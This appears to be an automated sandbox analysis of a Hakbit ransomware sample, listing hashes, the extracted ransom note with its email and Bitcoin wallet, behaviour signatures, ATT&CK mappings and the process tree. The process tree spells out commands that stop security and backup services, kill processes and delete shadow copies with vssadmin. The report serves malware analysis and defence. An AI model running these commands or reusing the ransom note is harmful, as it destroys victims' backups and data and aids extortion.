Overview

overview

10

Static

static

befc6ff8c6...15.exe

windows7_x64

10

befc6ff8c6...15.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    31-01-2022 23:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    befc6ff8c63889b72d1f5aec5e5accc1b4098a83cd482a6bb85182ecd640b415.exe

  • Size

    256KB

  • MD5

    070940acdcf608923d044edc79ba4121

  • SHA1

    5b1d1de92d8b8163ac70281d6afa3113d0f86362

  • SHA256

    befc6ff8c63889b72d1f5aec5e5accc1b4098a83cd482a6bb85182ecd640b415

  • SHA512

    41b35ca8765b7788461d198e63ba975800dbf0bc4bfa747769cc51399c74a969ea981d3d613cfeaf149a4c2c6d195b5c952fe45c5102ebf08387ec72540e6180

Score
10/10
hakbitransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt

Family

hakbit

Ransom Note
Atention! all your important files were encrypted! to get your files back send 1 Bitcoin and contact us with proof of payment and your Unique Identifier Key. We will send you a decryption tool with your personal decryption password. Where can you buy Bitcoins: https://www.coinbase.com https://localbitcoins.com Contact: zoula50@protonmail.com. Bitcoin wallet to make the transfer to is: 1HaLXTNdaXTGQtDuDURPA9kLxhyM4DzhsT Unique Identifier Key (must be sent to us together with proof of payment): ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ me+aDa9OmNfJAwWqxD6bWG1nyRs9DoaXekC4Mz4efke6v+Jy52Na4JpRGaz7WB3d33s6LSkfORtbxvzDt+zhFvlIg26Rp4kF02aJC7t+lODhK/Z2fhtfmbIqG9AiaBYcva4m3bsjiB6n+U12CEgGzIJgcJmwA/0V4DgQ1MbEraVQeYL+wo29tTLNdO7N5x6HSMDGl7m0xuW9Yn61qFHL90ftjeQ05TkmoiGoB4JuXzgWu6pokdQ8yGmWkrn0ENEmKKhw99btBjfV4RltmDlmDLpoqp5S3THkj3jSwu2SM3Pv4ng3wBGAl7/NuLrfNgYMID2duccgeuSXGuzoFAvl4w== ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Emails

zoula50@protonmail.com

Wallets

1HaLXTNdaXTGQtDuDURPA9kLxhyM4DzhsT

Signatures

  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

    ransomwarehakbit
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Deletes itself 1 IoCs
  • Enumerates connected drives 3 TTPs 18 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 3 IoCs
    evasion
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\befc6ff8c63889b72d1f5aec5e5accc1b4098a83cd482a6bb85182ecd640b415.exe
    "C:\Users\Admin\AppData\Local\Temp\befc6ff8c63889b72d1f5aec5e5accc1b4098a83cd482a6bb85182ecd640b415.exe"
    1⤵
    • Modifies extensions of user files
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1140
    • C:\Windows\system32\net.exe
      "net.exe" stop avpsus /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:524
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        3⤵
          PID:928
      • C:\Windows\system32\net.exe
        "net.exe" stop McAfeeDLPAgentService /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:108
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
          3⤵
            PID:1464
        • C:\Windows\system32\net.exe
          "net.exe" stop mfewc /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:516
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop mfewc /y
            3⤵
              PID:1192
          • C:\Windows\system32\net.exe
            "net.exe" stop BMR Boot Service /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:540
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop BMR Boot Service /y
              3⤵
                PID:1764
            • C:\Windows\system32\net.exe
              "net.exe" stop NetBackup BMR MTFTP Service /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1104
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                3⤵
                  PID:1804
              • C:\Windows\system32\sc.exe
                "sc.exe" config SQLTELEMETRY start= disabled
                2⤵
                  PID:1296
                • C:\Windows\system32\sc.exe
                  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                  2⤵
                    PID:1076
                  • C:\Windows\system32\sc.exe
                    "sc.exe" config SQLWriter start= disabled
                    2⤵
                      PID:1052
                    • C:\Windows\system32\sc.exe
                      "sc.exe" config SstpSvc start= disabled
                      2⤵
                        PID:1540
                      • C:\Windows\system32\taskkill.exe
                        "taskkill.exe" /IM mspub.exe /F
                        2⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1120
                      • C:\Windows\system32\taskkill.exe
                        "taskkill.exe" /IM mydesktopqos.exe /F
                        2⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1100
                      • C:\Windows\system32\taskkill.exe
                        "taskkill.exe" /IM mydesktopservice.exe /F
                        2⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1768
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" Delete Shadows /all /quiet
                        2⤵
                        • Interacts with shadow copies
                        PID:1716
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                        2⤵
                        • Interacts with shadow copies
                        PID:1240
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                        2⤵
                        • Interacts with shadow copies
                        PID:1992
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                        2⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:2040
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                        2⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:1492
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                        2⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:1704
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                        2⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:1020
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                        2⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:1228
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                        2⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:1464
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                        2⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:204
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                        2⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:1636
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                        2⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:1804
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                        2⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:620
                      • C:\Windows\system32\vssadmin.exe
                        "vssadmin.exe" Delete Shadows /all /quiet
                        2⤵
                        • Interacts with shadow copies
                        PID:1244
                      • C:\Windows\System32\notepad.exe
                        "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
                        2⤵
                        • Opens file in notepad (likely ransom note)
                        PID:236
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\befc6ff8c63889b72d1f5aec5e5accc1b4098a83cd482a6bb85182ecd640b415.exe
                        2⤵
                        • Deletes itself
                        PID:1620
                        • C:\Windows\system32\choice.exe
                          choice /C Y /N /D Y /T 3
                          3⤵
                            PID:1692
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1724

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Initial Access

                      Execution

                      Persistence

                      Privilege Escalation

                      Defense Evasion

                      File Deletion

                      2
                      T1107

                      Credential Access

                      Discovery

                      Query Registry

                      1
                      T1012

                      Peripheral Device Discovery

                      1
                      T1120

                      System Information Discovery

                      2
                      T1082

                      Lateral Movement

                      Collection

                      Exfiltration

                      Command and Control

                      Impact

                      Inhibit System Recovery

                      2
                      T1490

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
                        MD5

                        cefb01ffb094a704b2e6e15e84b2a6f9

                        SHA1

                        c7985db0ec4231e0432d593cf66fd34ba8d914ea

                        SHA256

                        e930c6bbfc370b549e584dd1e9237dbe89220d2c01bcf03d297ef7d1dd8502a9

                        SHA512

                        9609f1eed8b660ea93637503ca34aabd995f195af026d714d3010f79cb8c1cdd57aaf641b3a7d6ddffa6f4e74adb4e2601fe84764970373efd31cdf25ceb2aa5

                        Download Submit
                      • memory/1140-55-0x0000000000C50000-0x0000000000C96000-memory.dmp
                        Filesize

                        280KB

                        Download
                      • memory/1140-56-0x0000000002420000-0x000000001A8C0000-memory.dmp
                        Filesize

                        388.6MB

                        Download
                      • memory/1140-57-0x000007FEFC151000-0x000007FEFC153000-memory.dmp
                        Filesize

                        8KB

                        Download